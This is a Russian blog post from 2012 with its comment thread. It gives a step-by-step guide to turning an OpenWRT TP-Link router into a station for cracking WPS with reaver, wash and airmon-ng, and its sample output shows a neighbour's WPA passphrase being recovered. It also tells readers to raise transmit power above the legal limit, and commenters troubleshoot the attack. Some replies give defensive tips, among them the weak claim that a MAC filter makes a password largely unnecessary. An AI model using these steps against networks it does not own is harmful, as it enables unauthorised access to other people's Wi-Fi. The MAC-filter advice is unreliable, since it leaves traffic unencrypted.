04 октября 2012

Reaver или делаем из TL-WR1043ND (v1) хак-станцию

Здрасьте. Надысь, дали покурочить девайс Pineapple Mark IV. Что сказать, устройство интересное, хотя и не оригинальное, ибо от того же TP-Link отличается только специальной прошивкой на основе OpenWRT с массой хитрых программ для всё того  же аудита, менее мощным Wi-Fi адаптером (300mW супротив 500mW у TP-Link в режиме US-диапазона), и слегка закрытым "комунити", чрезвычайно неторопливо выпускающем обновления =)


Собсна, взять простой этот самый TP-Link, нашпиговать массой утилит и пригламурить это всё кулхацкер-стайл интерфейсом - и не отличить от Pineapple. Но суть не в этом. Есть там в этом ананасе интересная утилита - Reaver. Служит она для проверки устойчивости к несанкционированному доступу Wi-Fi сетей с включённой опцией WPS. А включена она сейчас практически везде, и всё для тех же глупых и нетерпеливых пользователей, любящих настраивать всё одной кнопочкой =) Насколько известно мне, основная масса устройств (роутеры, точки доступа) уже обзавелись новыми прошивками позволяющими отключать этот режим, но кто же из пользователей, в здравом уме будет:
  1. Прошивать свой аппарат новой прошивкой
  2. Отключать эту очень полезную (с их точки зрения) функцию WPS
Беда состоит в том, что облегчив жизнь простым пользователям, инженеры и программисты, разработавшие WPS, открыли настежь двери и без того дырявой безопасности Wi-Fi. Не, я не спорю, если использовать сертификаты, "белые списки доступа" и прочие Radius-авторизации - изучать через WPS сеть бессмысленно (почти). Но кто же это настраивает эти вещи у себя?) Параноик, сисадминищще или человек, знающий о безопасности не по корочкам полученным за красивые глаза =)

От слов к делу. Заходим в OpenWRT интерфейс, нашего дорогого сердцу, WR1043ND: Сеть => Wi-Fi => Редактировать => Режим - Монитор. Попутно зайдя во вкладку Расширенные настройки, выставим в поле Регион значение US - United States (это позволит повысить мощность на предыдущей вкладке с разрешённой в РФ мощности излучателя для бытовых WiFi с 200mW до 500mW). Вернёмся на предыдущую вкладку и нажмём кнопку Включить, дабы, собсна, включить Wi-Fi адаптер. С гуёвой настройкой покончено, дальше продолжаем в консоли SSH =)

Заходим по SSH на наш роутер. Выполняем 3 команды (интернет должен быть уже настроен, т.к. пакеты берутся оттуда; либо как вариант сделать локальное зеркало у себя, особенно учитывая состояние openwrt.org в данный момент): обновление списка пакетов, установка Reaver, установка Aircrack-ng:
opkg update
opkg install reaver
opkg install aircrack-ng
opkg install wireless-tools

Собсна, зачем нам aircrack-ng? Это тоже чудный инструмент, но для более брутального изучения криптоустойчивости алгоритмов WEP/WPA/WPA2 применяемых для шифрования Wi-Fi. Из этого пакета нам нужен будет только инструмент airmon-ng для включения интерфейса мониторинга (то что мы включили в гуёвом интерфейсе - это всего лишь указание ничего не делать с адаптером и просто его включить, не поднимая никаких hostapd и прочих, не нужных для аудита весчей).

Включаем интерфейс монитора:
airmon-ng start wlan0

Теперь посмотрим, а какие вокруг есть сети с поддержкой WPS:
wash -i mon0 -s
Флаг -s заставляет насильно сканировать сеть, а не тупо наблюдать за пойманными пакетами (по-умолчанию используется режим survey).

Подождав немного, прерываем наблюдение, ибо wash запускается в бесконечном режиме, и получаем примерно такую картину:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
DE:AD:BE:EF:B4:BC     1       -45   1.0          No          Vasya_net
AB:BA:BC:CB:50:A6     1       -78   1.0          No          Petya_net
CA:CB:CD:AC:7F:74     5       -88   1.0          No          Nyashka

Начинать изучение советую с наиболее сильной точки (определяется по столбцу RSSI, чем меньше значение - тем сильнее), в данном случае это Vasya_net. Почему с самой сильной? Да просто анализ будет быстрее =)

От этой точки нам важен BSSID - DE:AD:BE:EF:B4:BC. Скармливаем его reaver'у:
reaver -a -v -S -w -d0 -i mon0 -b DE:AD:BE:EF:B4:BC

Процесс пошёл:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from DE:AD:BE:EF:B4:BC
[+] Associated with DE:AD:BE:EF:B4:BC (ESSID: Vasya_net)
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] 00.00% complete @ 2012-10-04 03:38:03 (0 seconds/pin)
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] Trying pin 25515671
[+] 00.01% complete @ 2012-10-04 03:38:19 (0 seconds/pin)
[+] Trying pin 25525670
[+] Trying pin 25525670
[+] Trying pin 25525670
...

По итогу (процесс может занять довольно долгое время, а может и сработать сразу), высветится что-то вроде:
[+] Trying pin 99557712
[+] WPS PIN: '99557712'
[+] WPA PSK: 'vasin_super_parol'
[+] AP SSID: 'Vasya_net'

Вуаля) PIN подобран, ключ сети выяснен =)

PS: Что самое весёлое - изначально на TL-WR1043ND тоже есть WPS (точнее он называется там QSS, но смысл тот же). Прошив его OpenWRT - эта фича пропадаёт начисто и поднять его не так просто, но можно. Но зачем?) Зато на эту кнопочку можно повесить что-нибудь своё - например запуск скрипта по подбору PIN =)

40 комментариев:

  1. А есть какие готовые скрипты для wash & reaver чтобы вешать на кнопочу?

    ОтветитьУдалить
  2. Например: http://code.google.com/p/wifite/

    ОтветитьУдалить
  3. Анонимный14 января, 2013 23:28

    ну а как этим PIN-ом воспользоваться на той-же Openwrt(1043nd)

    ОтветитьУдалить
  4. Анонимный14 января, 2013 23:30

    sorry. не внимателен, вот же он
    [code][+] WPA PSK: 'vasin_super_parol'
    [/code]

    ОтветитьУдалить
  5. [!] Found packet with bad FCS, skipping..
    А это что значит? Висит достаточно долго

    ОтветитьУдалить
    Ответы
    1. это либо карточка не держит, либо сигнал барахлит
      можно подавить эти сообщения: wash --ignore-fcs
      но особо радоваться нечему =)

      Удалить
  6. да уж. вместе с этим параметром ничего не показывает. пустая таблица. хотя в гуе показывает 2 сети на 6-ом канале.

    А все описанное выше может относиться ко всем роутерам с опенврт? Просто на моем 842-ом тплике максимальная мощность 125 мватт

    ОтветитьУдалить
    Ответы
    1. OpenWRT тут вообще не при делах) Тут зависит больше от чипа wifi - у 842-го он AR9287, у 1043 - AR9103. Можете почитать на просторах интернета про AR9287 и отзывы о нём не особо впечатляют. Ну и сам роутер как бы не особо =) Если такая потребность ломать - берите Alfa AWUS036H =)

      Удалить
  7. Анонимный28 ноября, 2013 23:09

    Добрый день!
    Подскажите, а как сделать обратную операцию по отключению чужого роутера от моей сетки?
    Спасибо!

    ОтветитьУдалить
    Ответы
    1. 1) Отключить функцию WPS/QSS в своём роутере
      2) Сменить пароль на WiFi
      3) Ввести фильтр MAC-адресов (белый список - когда перечислены разрешённые устройства или чёрный список - когда запрещены определённые).

      Удалить
  8. Анонимный29 ноября, 2013 23:18

    Спасибо! А как же пользоваться радиусом?

    ОтветитьУдалить
    Ответы
    1. Тот кто умеет им пользоваться - обычно знают зачем он им =)
      А если вы спрашиваете, то походу не очень. Грубо говоря. это центр авторизации, когда надо на предприятии/провайдере объединить несколько систем авторизаций - в домене, в wifi, в vpn и так далее. Т.е. вынести все эти WEP/WPA на отдельное устройство с более шировким функционалом.

      Удалить
  9. Ну, насчет моего незнания логика у вас железная! :) Надеюсь с вашей помощью узнаю все тонкости настройки роутера.
    Тем не менее спасибо! Я так понимаю, что для домашней сети радиус не актуален?!
    Кстати, хотел спросить, если я введу фильтр мас-адресов, то пароль на wifi, в принципе, не нужен?

    ОтветитьУдалить
    Ответы
    1. Ну вобщем - да, дома такое мало кто поднимает, разве что маньяки-админы.
      Да, если введёте фильтр то пароль не особо нужен. Есть потенциальная опасность конечно - если перехватят MAC-адреса ваших разрешённых устройств то могут зайти подменив свои на эти. Плюс будет неудобство с новыми устройствами (гости, например) - их придётся забивать тоже =)

      Удалить
    2. Анонимный08 января, 2014 16:36

      Но и трафик не шифруется.

      Удалить
  10. Этими неудобствами можно пренебречь. Зато, насколько я понимаю, скорость должна увеличиться. Ведь в защищенной сети постоянно проверяется пароль? С каждым пакетом? Я хочу подключить приставку и попробовать посмотреть ip-телевидение. А скорость на инете у меня всего 2,5 мб. Так что хочу выжать все. Подскажете как лучше настроить роутер, чтобы и хулиганы не заходили и скорость была высокой?

    ОтветитьУдалить
  11. Такое было актуально раньше, когда и девайсы были зелёными и солнце было ярче =) Сейчас процессоры и чипы wifi довольно шустро обрабатывают шифрование на аппаратном уровне и считается что его включение понижает пропускную способность не более чем на 5%.

    Если вы собрались смотреть IPTV по wifi - лучше забыть про этот роутер =) Для IPTV через wifi лучше использовать роутеры с поддержкой 5GHz диапазона - там скорости будут ещё круче (у меня удавалось прокачать до реальных 100 мбит). Если IPTV будет по кабелю от роутера до приставки - то пофиг, хватит всему, т.к. там гигабитные порты.

    ОтветитьУдалить
  12. Спасибо за хороший совет!
    Удачи вам! Буду потихоньку разбираться.

    ОтветитьУдалить
  13. Этот комментарий был удален автором.

    ОтветитьУдалить
  14. НЕ получается первый шаг... Как быть?
    root@OpenWrt:~# airmon-ng start wlan0
    Wireless tools not found

    Вот лог.

    root@OpenWrt:~# opkg update
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/Packages.gz.
    Updated list of available packages in /var/opkg-lists/attitude_adjustment.
    root@OpenWrt:~# opkg install reaver
    Installing reaver (r113-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/reaver_r113-1_ar71xx.ipk.
    Installing libpcap (1.1.1-2) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libpcap_1.1.1-2_ar71xx.ipk.
    Installing libsqlite3 (3071201-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libsqlite3_3071201-1_ar71xx.ipk.
    Installing libpthread (0.9.33.2-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libpthread_0.9.33.2-1_ar71xx.ipk.
    Configuring libpthread.
    Configuring libpcap.
    Configuring libsqlite3.
    Configuring reaver.
    root@OpenWrt:~# opkg install aircrack-ng
    Installing aircrack-ng (1.1-3) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/aircrack-ng_1.1-3_ar71xx.ipk.
    Installing libopenssl (1.0.1e-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/libopenssl_1.0.1e-1_ar71xx.ipk.
    Installing zlib (1.2.7-1) to root...
    Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/zlib_1.2.7-1_ar71xx.ipk.
    Configuring zlib.
    Configuring libopenssl.
    Configuring aircrack-ng.
    root@OpenWrt:~#

    root@OpenWrt:~# airmon-ng start wlan0
    Wireless tools not found
    root@OpenWrt:~#

    ОтветитьУдалить
  15. unknown package 'wireless-tools'
    collected errors: opkg_install_cmd: cannot install package wireless-tools

    ОтветитьУдалить
  16. Спасибо, прокатило. Но :
    "Alexander L.1 августа 2013 г., 14:10
    [!] Found packet with bad FCS, skipping..
    А это что значит? Висит достаточно долго"

    То же самое. Роутер 100% рабочий. И рядом в этой же комнате есть роутеры с wps. Но не находит ничего, даже просто роутеры не видит. ПОстоянно на Found packet with bad FCS, skipping.. Через usb адаптер на пк с ос BackTrack работает. .... Есть еще идеи?

    ОтветитьУдалить
  17. Ответы
    1. Идей - вагон и маленькая тележка =)
      1. Аппаратная версия роутера? v1 или v2?
      2. Делаете ли airmon-ng start wlan0 перед wash/reaver? Если радиомодуль не перевести в режим monitor то может быть подобное.
      3. Google =)

      Удалить
  18. root@OpenWrt:~# airmon-ng start wlan0
    ps: invalid option -- A
    BusyBox v1.19.4 (2013-03-14 11:28:31 UTC) multi-call binary.

    Usage: ps

    Show list of processes

    w Wide output



    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon0)

    root@OpenWrt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    --------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...

    ОтветитьУдалить
    Ответы
    1. Большое подозрение, что радио-модуль уже занят чем-то. Возможно работает ранее созданная wifi-сеть, а вы пытаетесь добавить mon0 =)
      Для надежности лучше их все отключить/удалить, и создать новую wifi-cеть в режиме "Монитор". Это гарантирует поднятие "чистого" интерфейса.

      Удалить
  19. Этот комментарий был удален автором.

    ОтветитьУдалить
  20. Этот комментарий был удален автором.

    ОтветитьУдалить
  21. у меня 1043nd v2 . Не работает команда wash -i mon0 -s , точнее команда выполняется, но процесс поиска не идет, сразу выходит таблица этой команды и все, далее мгновенно появляется строка ожидания новой команды. Представляю лог моих действий:

    root@OpenWrt:~# airmon-ng start wlan0
    ps: invalid option -- A
    BusyBox v1.19.4 (2014-04-10 07:31:29 UTC) multi-call binary.

    Usage: ps

    Show list of processes

    w Wide output



    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon0)

    root@OpenWrt:~# iwconfig
    lo no wireless extensions.

    mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    RTS thr:off Fragment thr:off
    Power Management:off

    eth1 no wireless extensions.

    wlan0 IEEE 802.11bgn Mode:Master Tx-Power=20 dBm
    RTS thr:off Fragment thr:off
    Power Management:off

    eth0 no wireless extensions.

    root@OpenWrt:~# ifconfig
    eth0 Link encap:Ethernet HWaddr C0:4A:00:49:5F:D1
    inet6 addr: fe80::c24a:ff:fe49:5fd1/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:65 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:24421 (23.8 KiB)
    Interrupt:4

    eth1 Link encap:Ethernet HWaddr C0:4A:00:49:5F:D0
    inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::c24a:ff:fe49:5fd0/64 Scope:Link
    inet6 addr: fde3:9a4f:c2f9::1/60 Scope:Global
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1131 errors:0 dropped:0 overruns:0 frame:0
    TX packets:870 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:115786 (113.0 KiB) TX bytes:186494 (182.1 KiB)
    Interrupt:5

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:1443 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1443 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:98092 (95.7 KiB) TX bytes:98092 (95.7 KiB)

    mon0 Link encap:UNSPEC HWaddr C0-4A-00-49-5F-CF-00-44-00-00-00-00-00-00-00-00
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:551 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:128688 (125.6 KiB) TX bytes:0 (0.0 B)

    wlan0 Link encap:Ethernet HWaddr C0:4A:00:49:5F:CF
    inet6 addr: fe80::c24a:ff:fe49:5fcf/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:480 (480.0 B)

    root@OpenWrt:~# wash -i mon0 -s

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    --------------------------------------------------------------------------------------



    root@OpenWrt:~#
    Далее ради интереса ввожу
    root@OpenWrt:~# airodump-ng mon0
    CH -1 ][ Elapsed: 16 s ][ 2014-04-11 22:13

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    10:FE:ED:77:87:F4 0 22 0 0 6 54e. WPA2 TKIP PSK dfghr
    C0:4A:00:4C:A8:66 0 79 0 0 9 54e. WPA2 CCMP PSK TP-LINK_269
    FC:75:16:E8:92:48 0 165 65 29 11 54e WPA2 CCMP PSK Home 281

    BSSID STATION PWR Rate Lost Packets Probes

    FC:75:16:E8:92:48 84:7A:88:98:84:75 -1 0e- 0 0 65

    root@OpenWrt:~# reaver -a -v -S -w -d0 -i mon0 -b 10:FE:ED:77:87:F4

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 10:FE:ED:77:87:F4
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))
    [!] WARNING: Failed to associate with 10:FE:ED:77:87:F4 (ESSID: (null))

    И так до посинения. Кстати станция «dfghr» к которой я подбираю пароль моя, которая рядом. Там QSS я включил.

    ОтветитьУдалить
    Ответы
    1. v2 вроде только в транках поддержку включили

      К сожалению, у меня нет опыта работы с ним. В настройках wifi (Сеть->Wi-Fi) на этом адаптере (radio0) должна стоять только 1 настройка с режимом Monitor, плюс он должен быть включен

      Удалить
  22. Ответы
    1. Решил так: http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/ar71xx/generic/packages/reaver_r113-1_ar71xx.ipk

      Теперь др. Ошибка, при wash -i mon0 -s
      Выдает: can't load libpcap.so.1.1

      Удалить
    2. Наверно нужно взять там же http://downloads.openwrt.org/attitude_adjustment/12.09-rc1/ar71xx/generic/packages/libpcap_1.1.1-2_ar71xx.ipk
      =)
      Но я бы смотрел уже в сторону reaver-wps-t6x https://forums.hak5.org/index.php?/topic/35864-release-pixiewps-11-reaver-152/

      Удалить
  23. Анонимный28 мая, 2016 13:29

    [!] WARNING: Failed to associate with AC:F1:DF:29:73:8E (ESSID: Slavka-31)

    и ничего

    ОтветитьУдалить
  24. Скажите пожалуйста, а почему у меня после этой команды "airmon-ng start wlan0" высвечивается это:
    root@OpenWrt:~# airmon-zc start wlan0
    ps: unrecognized option: A
    BusyBox v1.28.3 () multi-call binary.

    Usage: ps

    Show list of processes

    w Wide output
    No interfering processes found
    PHY Interface Driver Chipset

    phy0 wlan0 ath10k_ahb Not pci, usb, or sdio

    И обрывается связь с роутером(подключен через патчкорд к ноуту)?

    ОтветитьУдалить
    Ответы
    1. Скорее всего, версия aircrack-ng не особо новая. На 1.4 таких проблем нет.

      Удалить